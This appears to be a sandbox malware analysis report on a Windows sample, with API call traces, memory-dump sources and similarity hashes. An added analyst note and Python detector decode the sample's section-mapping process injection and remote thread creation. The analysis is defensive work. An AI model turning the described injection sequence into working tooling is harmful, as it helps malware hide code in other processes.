• Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
• Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
• Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
• Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64

Control-flow Graph

Control-flow graph (edge list omitted): basic blocks 403103-40324b; the block 4031e8-403243 calls RtlCreateUserThread and then NtTerminateProcess.
APIs
Memory Dump Source
• Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
Similarity
• API ID: CreateProcessTerminateThreadUser
• String ID:
• API String ID: 1921587553-0
• Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
• Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
• Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
• Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5

Control-flow Graph

Control-flow graph (edge list omitted): basic blocks 403257-4032be, sharing the block 4031f0-403243 (RtlCreateUserThread, NtTerminateProcess) with the routine at 403103; calls sub_4012ec.
APIs
Memory Dump Source
• Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
Similarity
• API ID: CreateProcessTerminateThreadUser
• String ID:
• API String ID: 1921587553-0
• Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
• Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
• Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
• Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B
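
Analyst note (added to this report; the script below is not Joe Sandbox code and not code recovered from the sample). Read with the documented parameter order, the seven calls listed for the function at 401613 are: NtDuplicateObject with Options 2 (DUPLICATE_SAME_ACCESS); NtCreateSection with DesiredAccess 6 (SECTION_MAP_WRITE|SECTION_MAP_READ), SectionPageProtection 4 (PAGE_READWRITE), AllocationAttributes 08000000 (SEC_COMMIT) and a NULL FileHandle, i.e. a pagefile-backed section, mapped with Win32Protect 4 into the caller and into a second process whose handle the sandbox did not recover; then a second section with DesiredAccess 0E (SECTION_MAP_EXECUTE added) and SectionPageProtection 40 (PAGE_EXECUTE_READWRITE), mapped PAGE_READWRITE (4) into the caller and PAGE_EXECUTE_READ (20) into the other process. That is section-mapping injection: the payload is written through the local view and is already executable in the target, with no NtWriteVirtualMemory in the sequence. The routines at 403103 and 403257 then call RtlCreateUserThread followed by NtTerminateProcess (the report prints no arguments for those two calls). The script decodes these constants from the report's own API lines and flags the pattern. Two assumptions: the printed handle 000000FF is taken as this report's rendering of the (HANDLE)-1 / NtCurrentProcess pseudo-handle, and, because section handles are printed as ?, each view is attributed to the most recently created section by call order.

```python
# Added analyst script for this report (not Joe Sandbox code, not code recovered from
# the sample): decodes the constants in the API lines at 004016BE-004017C0 and flags
# the section-mapping pattern. Constant names are the documented Windows values.
# Assumption: the printed handle 000000FF is this report's rendering of (HANDLE)-1.
import re
from collections import namedtuple

# Constructed input: the API lines the report lists for the function at 401613, as printed.
REPORT_API_LINES = """
NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
"""

CURRENT_PROCESS = 0xFF  # assumption: NtCurrentProcess() as this report prints it
EXECUTE_BITS = 0xF0     # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY
SEC_COMMIT = 0x08000000
SECTION_ACCESS = {0x1: "SECTION_QUERY", 0x2: "SECTION_MAP_WRITE", 0x4: "SECTION_MAP_READ",
                  0x8: "SECTION_MAP_EXECUTE", 0x10: "SECTION_EXTEND_SIZE"}
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
SEC_ATTRIBUTES = {0x01000000: "SEC_IMAGE", 0x04000000: "SEC_RESERVE", SEC_COMMIT: "SEC_COMMIT",
                  0x10000000: "SEC_NOCACHE", 0x80000000: "SEC_LARGE_PAGES"}
DUP_OPTIONS = {0x1: "DUPLICATE_CLOSE_SOURCE", 0x2: "DUPLICATE_SAME_ACCESS"}
INHERIT = {1: "ViewShare", 2: "ViewUnmap"}
LINE_RE = re.compile(r"^(?P<api>\w+)\.\w+\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")

# api name, address of the call instruction, stack slots as printed (None where '?')
Call = namedtuple("Call", "api ref args")


def parse_report_lines(text):
    """Parse 'Api.Module(arg,...), ref: addr' lines; anything else is skipped."""
    calls = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            args = [None if a == "?" else int(a, 16) for a in m["args"].split(",")]
            calls.append(Call(m["api"], int(m["ref"], 16), args))
    return calls


def flag_names(value, table):
    """Render a bitmask as OR-ed constant names; undocumented bits stay as hex."""
    if value is None:
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    if value & ~sum(table):
        names.append(hex(value & ~sum(table)))
    return "|".join(names) or "0"


def name_of(value, table):
    return "?" if value is None else table.get(value, hex(value))


def describe(call):
    """Decode the arguments that matter, using the documented parameter order."""
    a = call.args
    if call.api == "NtCreateSection" and len(a) >= 7:
        return {"DesiredAccess": flag_names(a[1], SECTION_ACCESS),
                "SectionPageProtection": name_of(a[4], PAGE_PROTECT),
                "AllocationAttributes": flag_names(a[5], SEC_ATTRIBUTES),
                "FileHandle": "NULL (pagefile-backed)" if a[6] == 0 else name_of(a[6], {})}
    if call.api == "NtMapViewOfSection" and len(a) >= 10:
        return {"ProcessHandle": name_of(a[1], {CURRENT_PROCESS: "NtCurrentProcess"}),
                "InheritDisposition": name_of(a[7], INHERIT),
                "Win32Protect": name_of(a[9], PAGE_PROTECT)}
    if call.api == "NtDuplicateObject" and len(a) >= 7:
        return {"Options": flag_names(a[6], DUP_OPTIONS)}
    return {}


def find_section_injection(calls):
    """Flag an executable pagefile-backed section mapped writable into the caller and
    executable into another process. Section handles are '?' in the report, so each
    view is attributed to the most recently created section by call order."""
    findings, section = [], None
    for c in calls:
        if c.api == "NtCreateSection" and len(c.args) >= 7:
            protect, attrs, file_handle = c.args[4], c.args[5], c.args[6]
            executable = protect is not None and bool(protect & EXECUTE_BITS)
            section = ({"created_at": c.ref, "local": None, "remote": None}
                       if executable and attrs == SEC_COMMIT and file_handle == 0 else None)
        elif c.api == "NtMapViewOfSection" and len(c.args) >= 10 and section is not None:
            proc, protect = c.args[1], c.args[9]
            section["local" if proc == CURRENT_PROCESS else "remote"] = (c.ref, protect)
            local, remote = section["local"], section["remote"]
            if local and remote and local[1] == 0x04 and remote[1] and remote[1] & EXECUTE_BITS:
                findings.append({"technique": "section-mapping injection",
                                 "section_created_at": section["created_at"],
                                 "local_view": local[0], "remote_view": remote[0],
                                 "remote_protect": name_of(remote[1], PAGE_PROTECT)})
                section = None
    return findings


if __name__ == "__main__":
    parsed = parse_report_lines(REPORT_API_LINES)
    for c in parsed:
        print(f"{c.ref:08X} {c.api}: " + ", ".join(f"{k}={v}" for k, v in describe(c).items()))
    print("FLAGS:", find_section_injection(parsed))
```

Run as-is it prints one decoded line per call and a single finding for the section created at 0040176D (local PAGE_READWRITE view at 0040179E, remote PAGE_EXECUTE_READ view at 004017C0); the first, PAGE_READWRITE section is not flagged because it is never executable. Other Joe Sandbox API lines in the same format can be fed through parse_report_lines to reuse the classifier; any NtMapViewOfSection whose ProcessHandle is not the assumed current-process value is treated as a remote mapping.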

Control-flow Graph

Control-flow graph (edge list omitted): basic blocks 5f003c-5f091d; calls sub_5f0a3f, sub_5f0e0f, sub_5f0d90, VirtualAlloc, sub_5f0a69, VirtualProtect, sub_5f0cce, sub_5f0ce7, VirtualFree and LoadLibraryA.
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005F024D
Strings
Memory Dump Source
• Source File: 00000007.00000002.2263700057.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_5f0000_1D0F.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: 4b65ce4eff50f675edf1d61a99df40599f3613a345a7b7b0bfdd16d4a1f72893
                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                        • Instruction Fuzzy Hash: B9526974A01229DFDB64CF58C984BA8BBB1BF09304F1480D9E54DAB392DB34AE85DF14

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph (node: address range, calls -> successors)
                                                                                                        436: 76effd-76f016 -> 437
                                                                                                        437: 76f018-76f01a -> 438, 439
                                                                                                        438: 76f021-76f02d, CreateToolhelp32Snapshot -> 440, 441
                                                                                                        439: 76f01c -> 438
                                                                                                        440: 76f02f-76f035 -> 441, 447
                                                                                                        441: 76f03d-76f04a, Module32First -> 442, 443
                                                                                                        442: 76f053-76f05b -> (none)
                                                                                                        443: 76f04c-76f04d, call 76ecbc -> 448
                                                                                                        447: 76f037-76f03b -> 437, 441
                                                                                                        448: 76f052 -> 442
                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0076F025
                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 0076F045
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2264057033.000000000075D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_75d000_1D0F.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 3833638111-0
                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                        • Instruction ID: 3b0da6448144e833350baf14c0413bfa9b44beff34f66378e02ec7a964e876ab
                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                        • Instruction Fuzzy Hash: 68F096361007156BD7203BF5FD8DB6E76E9AF49764F100538FA43910C1DB74EC464661

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph (node: address range, calls -> successors)
                                                                                                        449: 5f0e0f-5f0e24, SetErrorMode * 2 -> 450, 451
                                                                                                        450: 5f0e2b-5f0e2c -> (none)
                                                                                                        451: 5f0e26 -> 450
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,005F0223,?,?), ref: 005F0E19
                                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,005F0223,?,?), ref: 005F0E1E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263700057.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_5f0000_1D0F.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                        • Instruction ID: d5a6bee1921c2ef6b516d6639c820d1612de59ea02b9ca9833ad81ad95a80bb3
                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                        • Instruction Fuzzy Hash: 21D0123154512CB7D7002A94DC09BDD7F1CDF05B62F048411FB0DD9081C774994046E5

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph (node: address range, calls -> successors)
                                                                                                        452: 4019c0-4019c6 -> 453, 454
                                                                                                        453: 4019e7-401a10 -> 462, 463
                                                                                                        454: 4019c8-4019dd, call 40127e -> (none)
                                                                                                        462: 401a13-401a46, call 40127e, Sleep, call 4014fb -> 471, 472
                                                                                                        463: 401a09-401a0c -> 462
                                                                                                        471: 401a55-401a5b -> 475, 476
                                                                                                        472: 401a48-401a50, call 4015fb -> 471
                                                                                                        475: 401a60-401a65 -> 477
                                                                                                        476: 401a69 -> 475, 477
                                                                                                        477: 401a6c-401a9a, call 40127e -> (none)
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Sleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 3472027048-0
                                                                                                        • Opcode ID: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
                                                                                                        • Instruction ID: 8602aea7765920f14b43c6808a0d2033de268e003b0f0e4b19403496b7ccbc2b
                                                                                                        • Opcode Fuzzy Hash: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
                                                                                                        • Instruction Fuzzy Hash: 2B11CE3230A205EADB005AD9A941FBB32199B40754F3041B7B603B90F1953D8913BF2F

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph (node: address range, calls -> successors)
                                                                                                        486: 4019e0-401a10 -> 492, 493
                                                                                                        492: 401a13-401a46, call 40127e, Sleep, call 4014fb -> 501, 502
                                                                                                        493: 401a09-401a0c -> 492
                                                                                                        501: 401a55-401a5b -> 505, 506
                                                                                                        502: 401a48-401a50, call 4015fb -> 501
                                                                                                        505: 401a60-401a65 -> 507
                                                                                                        506: 401a69 -> 505, 507
                                                                                                        507: 401a6c-401a9a, call 40127e -> (none)
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 4152845823-0
                                                                                                        • Opcode ID: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                                                                        • Instruction ID: 6e8e83dbc6cb5325300a6df4c81bf03677ed1736eef4dabc06710691df282c78
                                                                                                        • Opcode Fuzzy Hash: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                                                                        • Instruction Fuzzy Hash: FA016D3230A209EADB005AD8AD41E7B3229AB40754F3001B7BA03790F1953D99137F2F

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph (node: address range, calls -> successors)
                                                                                                        516: 4019eb-401a10 -> 520, 521
                                                                                                        520: 401a13-401a46, call 40127e, Sleep, call 4014fb -> 529, 530
                                                                                                        521: 401a09-401a0c -> 520
                                                                                                        529: 401a55-401a5b -> 533, 534
                                                                                                        530: 401a48-401a50, call 4015fb -> 529
                                                                                                        533: 401a60-401a65 -> 535
                                                                                                        534: 401a69 -> 533, 535
                                                                                                        535: 401a6c-401a9a, call 40127e -> (none)
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 4152845823-0
                                                                                                        • Opcode ID: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                                                                        • Instruction ID: 2b2adc88e5ab551374836522510027b0c35959e32ac3f93f20a40eb2707c2e9b
                                                                                                        • Opcode Fuzzy Hash: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                                                                        • Instruction Fuzzy Hash: C2014C3230A205EBDB009AD4ED41B6A3269AB44714F3041B7BA13B91F1D53D9A537F2B

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph (node: address range, calls -> successors)
                                                                                                        544: 401a04-401a46, call 40127e, Sleep, call 4014fb -> 553, 554
                                                                                                        553: 401a55-401a5b -> 557, 558
                                                                                                        554: 401a48-401a50, call 4015fb -> 553
                                                                                                        557: 401a60-401a65 -> 559
                                                                                                        558: 401a69 -> 557, 559
                                                                                                        559: 401a6c-401a9a, call 40127e -> (none)
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 4152845823-0
                                                                                                        • Opcode ID: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                                                                        • Instruction ID: 8da435b4ef065fa937355dde1d01ef47451206c1f83fca999a74837282515cb4
                                                                                                        • Opcode Fuzzy Hash: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                                                                        • Instruction Fuzzy Hash: 8B01363630A209EADB005AD8AD41EBA22559B44314F3042B7BA13B91F5D53D8A137F2F
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 4152845823-0
                                                                                                        • Opcode ID: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                                                                        • Instruction ID: da9cf87a9ed9cba2a5618582a19ce6b128e8deecbf4ee8231104359b1f28a93a
                                                                                                        • Opcode Fuzzy Hash: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                                                                        • Instruction Fuzzy Hash: 4601863230A209EADB005AD49D41FBA22199B44714F3041B7BA13B90F1D53D8A137F2F
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0076ED0D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2264057033.000000000075D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_75d000_1D0F.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                        • Instruction ID: 80aa69571d4a516885e739d5ad535428cc02fec2ef88312d5ba01738a350d2bd
                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                        • Instruction Fuzzy Hash: 89113C79A00208EFDB01DF98C985E99BBF5AF08750F198094F9489B362D375EA90DF90
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 4152845823-0
                                                                                                        • Opcode ID: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                                                                        • Instruction ID: ef4a3633df93866afb86b86826f27a476d683f03040323dac8a7d7c578d0eba4
                                                                                                        • Opcode Fuzzy Hash: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                                                                        • Instruction Fuzzy Hash: 17F04432309206EBDB01AAD4DD41FAA3229AB44354F3041B7BA13B90F1D53C86127F2B
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                          • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                          • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 4152845823-0
                                                                                                        • Opcode ID: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                                                                        • Instruction ID: 08c596e776171f083f15ab2e9130eea247f108212a51f0ba4fb69116c36cf548
                                                                                                        • Opcode Fuzzy Hash: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                                                                        • Instruction Fuzzy Hash: 4BF0FF3230A209EADB005AD59D51EAA26699B44354F3041B7BA13B90F1D53D8A137F2B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 39ba6718c5b4acb6fcb90013f1bab96879de86035533205ab17ba445abaee414
                                                                                                        • Instruction ID: 6725721ff3489d431dd836171e340eb16c8ebd58ca09b28f7b875ac3b9798d56
                                                                                                        • Opcode Fuzzy Hash: 39ba6718c5b4acb6fcb90013f1bab96879de86035533205ab17ba445abaee414
                                                                                                        • Instruction Fuzzy Hash: 43F0273A30669697DB135E7CD0009CCFF10FD6B6207B88BD2D0C09A141C222845BCB90

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:14.9%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:50
                                                                                                        Total number of Limit Nodes:2

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0070024D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2519523064.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_700000_jfrhswe.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID: cess$kernel32.dll
                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                        • Instruction ID: 9be9b3c6779dbc4fec803037c48c4e54be1ef0d9e37ab80a9898581bd6dc0544
                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                        • Instruction Fuzzy Hash: 5C527974A00229DFDB64CF58C984BA8BBB1BF09314F1481E9E50DAB391DB34AE94DF54

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,00700223,?,?), ref: 00700E19
                                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,00700223,?,?), ref: 00700E1E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2519523064.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_700000_jfrhswe.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                        • Instruction ID: 363d1c857498136fbe31aee574387ff28b79b8b4375f79cccd03c8d3e1615692
                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                        • Instruction Fuzzy Hash: AED01231145128B7D7003A94DC09BCD7B5CDF05B62F008411FB0DE9080C774994046E5

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 0074EE6D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2520233894.000000000073D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_73d000_jfrhswe.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FirstModule32
                                                                                                        • String ID:
